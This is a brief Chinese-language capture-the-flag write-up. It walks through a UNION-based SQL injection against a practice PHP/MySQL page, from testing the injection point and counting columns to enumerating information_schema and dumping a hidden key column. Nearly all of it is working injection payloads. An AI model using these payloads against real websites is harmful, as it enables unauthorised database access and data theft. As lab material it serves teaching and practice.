链接: http://ctf5.shiyanbar.com/8/index.php?id=1
方法:sql注入(php+MySQL)
1.首先判断是否是注入点
http://ctf5.shiyanbar.com/8/index.php?id=1 and1=1
http://ctf5.shiyanbar.com/8/index.php?id=1 and1=2
发现页面显示不一样,是注入点
2.猜解字段数
http://ctf5.shiyanbar.com/8/index.php?id=1 order by 2
http://ctf5.shiyanbar.com/8/index.php?id=1 order by 3
发现2正常3不正常,字段数是2
3.爆破数据库
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,schema_name from information_schema.schemata
通过union select 1,database() 发现my_db是当前数据库
4.爆破数据库中的表
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,table_name from information_schema.tables where table_schema='my_db'
发现就是thiskey这个表
5.查看thiskey表中字段
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,column_name from information_schema.columns where table_schema='my_db'
发现存在一个k0y列
5.查看k0y列中的数据
http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,k0y from thiskey
有关information_schema数据库中的信息参考http://help.wopus.org/mysql-manage/607.html